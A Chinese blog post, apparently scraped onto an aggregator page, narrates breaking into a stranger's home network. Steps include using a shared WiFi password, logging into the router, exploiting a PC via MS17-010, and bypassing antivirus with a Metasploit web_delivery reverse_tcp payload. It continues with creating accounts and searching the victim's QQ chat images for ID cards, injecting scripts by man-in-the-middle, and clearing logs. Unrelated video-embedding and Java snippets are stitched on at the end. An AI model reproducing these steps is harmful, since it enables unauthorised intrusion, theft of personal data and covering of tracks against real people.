记一次无线渗透

article/2025/9/27 15:31:38

在这里插入图片描述
用到的工具
一台root的安卓手机(我这台手机刷了miui9)
Csploit 安卓渗透神器
下载地址:https://github.com/cSploit/android/releases
Kali meterpreter
当然你有Kali的Nethunter设备更好
在这里插入图片描述
开始测试
利用万能钥匙找一波wifi,运气好找到一个
在这里插入图片描述
连接wifi 用小米系统自带的WiFi分享功能,生成分享二维码。
然后可以截图保存,用任何带有扫一扫功能的手机扫描二维码,就能得到wifi密码。
在这里插入图片描述
有了WiFi密码,我们就可以试一下路由器的后台,一般家用路由器,都会把wifi密码和后台密码设置成一样的,这次运气也不错,直接进入后台
在这里插入图片描述
进入后台之后找了一下宽带账号,结果发现这只是一台拓展路由器,主路由器是192.168.1.1
在这里插入图片描述
浏览器直接访问192.168.1.1 ,发现来联通宽带登陆后台,试了一波弱口令,不能登陆,看来需要找到手机号码。
在这里插入图片描述
Wifi密码的作用到此就结束了,上安卓渗透神奇csploit
Csploit 内网渗透
手机安装好csploit,运行获得root权限,csploit会自动自动更新和下载msf核心(翻墙更新速度会更快,注意:开代理后软件不能做网络扫描),正常运行界面如下图。
在这里插入图片描述
Csploit不能识别国内的网络设备的名称,这里我们下载另一个网络工具Fing配合着使用,用Fing扫描出来的设备都有对应的名称,这样就比较方便筛选攻击对象。
在这里插入图片描述
Csploit 攻击教程网上有很多,请自行百度
给大家一个演示视频:https://www.youtube.com/user/jaofnee(需要翻墙)
通过csploit 和 Fing的扫描结果对比除开自己的电脑,内网中还有一台lenovoPC
在这里插入图片描述
在csploit扫描页面,点击192.168.0.110目标,进入模块利用界面。
安图中1 2 3 4步进行操作,作用是扫描端口漏洞并利用。
在这里插入图片描述
1、端口扫描工具扫描开放端口
在这里插入图片描述
2、然后运行服务检测工具
在这里插入图片描述
3、使用攻击方案查找工具,匹配完攻击脚本后,点击右上角选项全部运行。
在这里插入图片描述
4、我这里全部运行之后没有脚本利用成功,如果能运行成功的话,返回上一级页面,点击会话,就能获得一个shell。
在这里插入图片描述
之后又进行了一波中间人攻击,但从后台流量情况来看发现这家伙一直在看电视(M321是一台华为盒子),很少玩电脑,中间人攻击对苹果手机无效(之前用同事的手机测试过,苹果手机会直接断网),这样一来截取到的数据包非常少,没有可以利用的信息。
在这里插入图片描述
渗透工具测试
移动工具渗透无果,现在只能上PC工具了。这个内网有两个网段192.168.0.0/24和192.168.1.0/24,利用ms17-010扫描工具试一波~,运气比较好发现刚刚那台联想PC存在该漏洞
在这里插入图片描述
利用之前搭好的win2003 NAS工具包和kali进行漏洞利用,永恒之蓝工具能利用成功,说明漏洞确实存在。
在这里插入图片描述
但是运用Doublepulsar,导入dll执行文件失败,原因未知。。。
在这里插入图片描述
最后转战kali
meterpreter好像已经有了ms17-010的exploit脚本,对meterpreter直接升级,利用ms17_010_eternalblue 直接获得webshell
在这里插入图片描述
在目录中发现了360,可以猜测之前NAS工具没有利用成功应该是360起了一定的防护作用,同时也说明了meterpreter有一定程度上的免杀作用。
在这里插入图片描述
shell获取到了但是不能利用meterpreter模块,可能是360的缘故shell连接也不稳定,执行一两个命令就没有回显了。于是到网上找到了一篇免杀文章“Metasploit后门免杀模块之绕过某安全防护”文章链接https://bbs.ichunqiu.com/thread-20934-1-1.html 里面有视频教程。
免杀思路:
在这里插入图片描述
可能是因为性能原因,同一台kali上开两个msf实验时msf运行非常慢 最后也不能成功,于是用了两台kali。
第一步、kali-1上利用msf生成免杀powershell代码,同时开启监听

msfconsleuse exploit/multi/script/web_deliveryset target 2set payload windows/meterpreter/reverse_tcpset LHOST [本地ip]set URIPATH /exploit /

在这里插入图片描述
第二步、kali-2上利用msf中的ms17-010获取靶机一个不稳定的shell,并执行免杀powershell命令(msf的百年套路就不写了)。
执行完后kali-1上就获得了稳定的meterpreter链接:
在这里插入图片描述
获得了meterpreter,可以提升到system权限但是不能截屏。继续工作,创建账号开通3389,但是远程链接任不能用,查看3389端口确实开了呀~~~心塞(应该是防火墙拦截了)。
在这里插入图片描述
只能另辟蹊径。回想一下之前的目的是要找到宽带手机号码和密码,现在已经获得了system shell权限但是不能远程控制,那就只能翻翻敏感目录了,目标瞄向QQ、wechat和用户桌面文件。
用meterpreter链接一个shell
查看盘符
Diskpart
LIST VOLUME
在这里插入图片描述
查看qq号码和目录:

dir /s /a c:\ | find “Tencent\Users\”

获得qq号~
在这里插入图片描述
一个男的,名字刚好和wifi名称匹配,哎不想和男的聊算了不加他。。
在这里插入图片描述
社攻一下,没有发现密码泄露…可能是社工库太菜了…

在这里插入图片描述
查看wechat号和目录:dir /s /a c:\ | find “\wechatdata\WeChat Files”,没有结果。此人居然没有用电脑微信。。。
找到了qq的目录,我们可以翻一下他的聊天图片,看会不会有身份证之类的敏感图片
qq的大部分的图片存放在下面3个目录中

..\..\Tencent Files\[qq号]\Image\C2C #一对一聊天图片目录..\..\Tencent Files\[qq号]\Image\Group #群聊图片目录..\..\Tencent Files\[qq号]\Video #视频图片目录

利用merterpreter下载这些文件,要注意在merterpreter中切换目录好像只能一级一级切换,在切换带有空格名称的目录时要用””符号。
在这里插入图片描述
翻了一波图片,结果只发现一张貌似远程桌面的图片
在这里插入图片描述
既然用过远程那我们看一下远程记录缓存文件,可惜是空的…远程IP也ping不通
在这里插入图片描述
然后看一下Desktop,这绝对是一台公司的电脑,貌似是一个链家的经理
在这里插入图片描述
最后做个脚本提示该用户改wifi的密码吧
通过csploit中间人攻击利用脚本注入模块,下面是本地效果演示:
在这里插入图片描述
最后每当用户浏览http网站时浏览器便会自动弹出以下提示(对https的网站无效)。
在这里插入图片描述
渗透到此就结束吧。清除日志。

总结:
1、自己家的wifi千万不要用万能钥匙共享。
2、记得打好补丁,特别是445的,内网中Windows最好撸进去的就是445了
3、定期检查自己的电脑是不是中远控了


http://chatgpt.dhexx.cn/article/ZuApmueY.shtml

相关文章

为网络安全红队方向提供的资源,工具大合集(渗透测试)

这是一份必备的资源大合集,收录了最优秀的网络安全红队方向(渗透测试)的资源和工具。 (文末领取读者福利) 无论您是初学者还是专业人士,都能从中获得所需的技能和知识。 在这个信息化时代,网络…

如何在网站中插入视频

 很多新手站长在往自己网站里,添加土豆优酷等视频网站里的视频时,会遇到一些麻烦,珊珊在这里向大家介绍一种简单方法. 1.首先要找到要插入的视频,如下图点击分享给朋友右侧的小按钮. 2.点击按钮后弹出一个窗口点击复…

Word中轻松插入本地视频

场景 在Word文档中插入视频 实现 新建或打开Word文档 找到上面插入菜单栏,点击并选择对象 点击后选择PPT 点击确定 此时会打开PPT,然后再选择上面的插入 选择插入下的视频选项,然后选择PC上的视频 选择视频后点击插入 可以调整视频大小 …

如何在html里插入视频

第一步&#xff1a;首先下载video.js&#xff0c;百度一下就能找到。 这个是下载后的目录。 第二步&#xff1a;先把要用到的js\css\swf都加载到html页面上。 如&#xff1a; 第三步&#xff1a;加入下面的代码&#xff1a; <video id"my_video_1" class"…

制作往图片里插入视频,视频添加到图片上播放

在视频中还有个小视频同时播放&#xff0c;这种画中画的效果以前都学习过&#xff0c;那在图片上插入视频播放&#xff0c;可以用媒体梦工厂中的画中画功能来制作吗&#xff1f;这个肯定是可以的了。下面就来看看怎么的操作的吧。 先来看看图片加视频制作出来的画中画效果 制作…

插入视频--使用<video>标签为网页添加视频

使用方法 举例 显示结果 在网页上添加视频和添加音频的标签属性用法相同。 讲解 1.autoplay:如果出现该属性&#xff0c;则视频在就绪后马上播放。 2.controls:如果出现该属性&#xff0c;则向用户显示控件&#xff0c;比如播放按钮。 3.loop:如果出现该属性&#xff0c;…

视频剪辑工具,如何批量在图片中插入视频

怎么批量在图片中插入视频呢&#xff1f;其实这是一种很常见的效果&#xff0c;那么这种效果是怎么制作的呢&#xff1f;下面随小编一起来操作。 所需工具 多张图片、视频素材 操作步骤 运行媒体梦工厂&#xff0c;将图片导入画中画板块中的“底画”中&#xff0c;多张图片&…

教你给视频画面任意位置插入GIF图

视频怎么添加GIF图片呢&#xff1f;如何在视频任意位置添加的呢&#xff1f;其实很简单。教你这个简单的剪辑方法。一起来试试吧。 准备工具&#xff1a; 视频素材及动图 下载一个视频剪辑高手 开始操作&#xff1a; 运行软件登录上&#xff0c;在多种功能上选择“批量剪辑视…

计算机word如何提交,如何在word添加视频?

您可以从计算机或Internet添加视频以直接在Word文档中播放。 此功能使您(或与您共享文档的人)可以直接观看视频而无需离开文档。 将视频添加到Word文档 将离线视频(或计算机存储中的视频)添加到Word文档的不利之处在于&#xff0c;它们只能在您的PC上播放。 如果您将文档发送给…

如何在html网页中插入视频(以及让视频自动播放的问题)

直接进入正题&#xff1a; 关于视频的插入可使用 video标签 如下图 简单介绍下用到的几个属性 class定义了video类 在style中调整这个类的长度和高度属性&#xff1b; src处引入视频的链接&#xff1b; controls属性&#xff1a;允许用户控制视频的播放&#xff0c;包括音…

HTML插入视频和音频

一、插入视频 src表示视频来源位置 height表示视频高度 autoplay表示视频自动播放 loop表示循环播放 controls表示进度控制条 muted表示静音播放 poster表示视频封面所用的图片路径 video/mp4表示视频的格式 例如&#xff1a; <video src"images\sp1.mp4&quo…

如何在html中加入视频

第一步&#xff1a;首先下载video.js&#xff0c;百度一下就能找到。 这个是下载后的目录。 第二步&#xff1a;先把要用到的js\css\swf都加载到html页面上。 如&#xff1a; <link href"video-js/video-js.css" rel"stylesheet" type"text/css&qu…

关于使用video标签插入视频时,视频无法播放的问题

写代码遇到一个问题&#xff1a;使用video标签插入视频时&#xff0c;在chrome中无法播放&#xff0c;只显示了一个封面图片&#xff0c;在ie却可以播放。 video的使用是看别人的&#xff1a; 由于照搬别人的代码&#xff0c;我写的代码如下&#xff1a; <video width&q…

HTML视频插入

本文介绍两种视频插入方法&#xff08;为了防止有些视频播放不了不要放中文路径&#xff09; 第一种页面显示视频使用video标签&#xff1a; <video width"320" height"240" controls"controls"><source src"mp4/qq.mp4" &g…

如何在网页中插入视频

想在网页中插入视频从网上搜索了大概有以下两种方法&#xff1a; 是由HTML5自带的标签&#xff0c;这个标签就可以适用于很多的浏览器&#xff0c;但是对视频的格式有很高的要求&#xff0c;假如你是MP4的视频格式&#xff0c;那么就要求你的编码方式一定要是AVC(H264)的。建议…

如何插入视频

视频插入 我们在微信小程序中&#xff0c;经常看见一些新闻报道除了汉字解说有的还附带着视频。这样更能吸引用户的兴趣。那么问题来了&#xff0c;怎样在微信小程序中插入想要的视频呢&#xff1f;接下来让我给大家浅薄的讲解一下吧。 这是我插入的视频&#xff1a; 我们在.w…

JAVA中DateTime获取当前时间

原文链接&#xff1a;这里&#xff01; 参考代码&#xff1a; Test public void test(){DateTime time new DateTime(); //获取当前时间System.out.println(time); //输出当前时间 }需要传参数的可以看 这篇文章。 springMVC中从前台往后台传时间 – 每天进步一点点 (longku…

java 获取时间的方法

Java的时间是通过字节码指令来控制的&#xff0c;所以 java程序的运行时间是通过字节码指令来控制的。但是由于 Java程序在运行时&#xff0c; JVM会产生一些状态&#xff0c;所以在执行 JVM指令时&#xff0c; JVM也会产生一些状态。 我们在执行 java程序时&#xff0c;主要是…

java获取当前时间戳的方法

获取当前时间戳 //方法 一 System.currentTimeMillis(); //方法 二 Calendar.getInstance().getTimeInMillis(); //方法 三 new Date().getTime(); 获取当前时间 SimpleDateFormat df new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");//设置日期格式 String date df.…

Java获取当前时间的小时/分钟

java获取当前时间的小时/分钟等。。。 方法一&#xff1a; Date date new Date(); int hours date.getHours();方法二&#xff1a; GregorianCalendar calendar new GregorianCalendar(); int hour calendar.get(Calendar.HOUR_OF_DAY); System.out.println("hour&…